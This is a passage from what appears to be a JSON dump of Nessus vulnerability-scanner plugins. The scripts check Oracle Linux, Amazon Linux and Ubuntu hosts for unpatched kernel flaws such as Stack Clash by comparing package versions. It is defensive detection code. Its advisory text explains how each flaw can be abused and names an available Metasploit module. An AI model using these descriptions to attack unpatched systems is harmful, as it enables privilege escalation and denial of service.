Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to\n RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack\n will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance\n between the end of the PIE binary's read-write segment and the start of the stack becomes small enough\n that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5.\n This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to\n i386 based systems. (CVE-2017-1000371)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-1524.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17666\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['2.6.32-754.29.1.el6'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2020-1524');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '2.6';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'kernel-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-2.6.32'},\n {'reference':'kernel-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-2.6.32'},\n {'reference':'kernel-abi-whitelists-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-abi-whitelists-2.6.32'},\n {'reference':'kernel-debug-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-2.6.32'},\n {'reference':'kernel-debug-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-2.6.32'},\n {'reference':'kernel-debug-devel-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-2.6.32'},\n {'reference':'kernel-debug-devel-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-2.6.32'},\n {'reference':'kernel-devel-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-2.6.32'},\n {'reference':'kernel-devel-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-2.6.32'},\n {'reference':'kernel-firmware-2.6.32-754.29.1.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-firmware-2.6.32'},\n {'reference':'kernel-headers-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-2.6.32'},\n {'reference':'kernel-headers-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-2.6.32'},\n {'reference':'perf-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perf-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.29.1.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.29.1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:26", "description": "An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be jmp'ed over, this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010). (CVE-2017-1000364)\n\nThe offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIMIT_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365 . (CVE-2017-1000371)", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : kernel (ALAS-2017-845) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364", "CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2019-04-10T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:kernel-headers", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:perf-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-845.NASL", "href": "https://www.tenable.com/plugins/nessus/100874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-845.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100874);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-1000364\", \"CVE-2017-1000371\");\n script_xref(name:\"ALAS\", value:\"2017-845\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2017-845) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An issue was discovered in the size of the stack guard page on Linux,\nspecifically a 4k stack guard page is not sufficiently large and can\nbe jmp'ed over, this affects Linux Kernel versions 4.11.5 and earlier\n(the stackguard page was introduced in 2010). (CVE-2017-1000364)\n\nThe offset2lib patch as used by the Linux Kernel contains a\nvulnerability, if RLIMIT_STACK is set to RLIMIT_INFINITY and 1\nGigabyte of memory is allocated (the maximum under the 1/4\nrestriction) then the stack will be grown down to 0x80000000, and as\nthe PIE binary is mapped above 0x80000000 the minimum distance between\nthe end of the PIE binary's read-write segment and the start of the\nstack becomes small enough that the stack guard page can be jumped\nover by an attacker. This is a different issue than CVE-2017-1000370\nand CVE-2017-1000365 . (CVE-2017-1000371)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-845.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.9.27-14.33.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.9.27-14.33.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:35", "description": "When running as a Xen 64-bit PV guest, user mode processes not supposed to be able to access I/O ports may be granted such permission, potentially resulting in one or more of in-guest privilege escalation, guest crashes (Denial of Service), or in-guest information leaks. (CVE-2016-3157)\n\nIn some cases, the kernel did not correctly fix backward jumps in a new eBPF program, which could allow arbitrary reads. (CVE-2016-2383)\n\nThe kernel incorrectly accounted for the number of in-flight fds over a unix domain socket to the original opener of the file descriptor.\nAnother process could arbitrarily deplete the original file opener's maximum open files resource limit. (CVE-2016-2550)\n\nA resource-exhaustion vulnerability was found in the kernel, where an unprivileged process could allocate and accumulate far more file descriptors than the process' limit. A local, unauthenticated user could exploit this flaw by sending file descriptors over a Unix socket and then closing them to keep the process' fd count low, thereby creating kernel-memory or file-descriptors exhaustion (denial of service). (CVE-2016-2847)", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : kernel (ALAS-2016-669)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2383", "CVE-2016-2550", "CVE-2016-2847", "CVE-2016-3157"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:kernel-headers", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:perf-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-669.NASL", "href": "https://www.tenable.com/plugins/nessus/89966", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-669.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89966);\n script_version(\"2.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\", \"CVE-2016-3157\");\n script_xref(name:\"ALAS\", value:\"2016-669\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2016-669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When running as a Xen 64-bit PV guest, user mode processes not\nsupposed to be able to access I/O ports may be granted such\npermission, potentially resulting in one or more of in-guest privilege\nescalation, guest crashes (Denial of Service), or in-guest information\nleaks. (CVE-2016-3157)\n\nIn some cases, the kernel did not correctly fix backward jumps in a\nnew eBPF program, which could allow arbitrary reads. (CVE-2016-2383)\n\nThe kernel incorrectly accounted for the number of in-flight fds over\na unix domain socket to the original opener of the file descriptor.\nAnother process could arbitrarily deplete the original file opener's\nmaximum open files resource limit. (CVE-2016-2550)\n\nA resource-exhaustion vulnerability was found in the kernel, where an\nunprivileged process could allocate and accumulate far more file\ndescriptors than the process' limit. A local, unauthenticated user\ncould exploit this flaw by sending file descriptors over a Unix socket\nand then closing them to keep the process' fd count low, thereby\ncreating kernel-memory or file-descriptors exhaustion (denial of\nservice). (CVE-2016-2847)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-669.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.1.19-24.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.1.19-24.31.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:10", "description": "Venkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-2946-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8812", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2946-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90400", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2946-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90400);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-8812\", 